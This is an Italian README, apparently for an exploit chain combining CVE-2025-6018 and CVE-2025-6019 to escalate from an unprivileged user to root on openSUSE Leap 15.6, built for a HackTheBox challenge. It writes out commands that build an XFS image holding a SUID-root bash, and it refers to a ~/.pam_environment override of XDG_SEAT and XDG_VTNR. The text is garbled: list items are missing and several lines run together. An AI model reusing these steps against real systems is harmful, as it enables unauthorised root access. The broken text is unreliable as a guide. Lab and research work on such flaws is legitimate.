
Catena di exploit per escalation dei privilegi (CVE-2025-6018 + CVE-2025-6019) per openSUSE Leap 15.6
Questo exploit è stato sviluppato per risolvere una sfida HackTheBox mirata a openSUSE Leap 15.6.
Questo exploit si basa sulla ricerca originale del Qualys Security Team:
Implementazione di riferimento aggiuntiva:
Questo exploit combina due vulnerabilità per ottenere un'escalation dei privilegi locali da un utente non privilegiato a root su openSUSE Leap 15.6:
L'exploit richiede un'immagine del filesystem XFS pre-creata contenente un binario bash SUID. Questa deve essere creata su una macchina Linux dove si hanno privilegi di root:
dd if=/dev/zero of=xfs.image bs=1M count=400
mkfs.xfs xfs.image
mkdir -p /tmp/mnt
mount xfs.image /tmp/mnt
cp /bin/bash /tmp/mnt/bash
chmod 04755 /tmp/mnt/bash
umount /tmp/mnt
Verifica che l'immagine sia stata creata correttamente:
file xfs.image
# Should output: "SGI XFS filesystem data (blksz 4096, inosz 256, v2 dirs)"
~/.pam_environment con override di XDG_SEAT e XDG_VTNRSe l'exploit fallisce:
file xfs.imagesystemctl status udisks2Questo exploit è solo a scopo educativo e per test di sicurezza autorizzati. Utilizzalo in modo responsabile e solo su sistemi di cui hai il permesso di testare.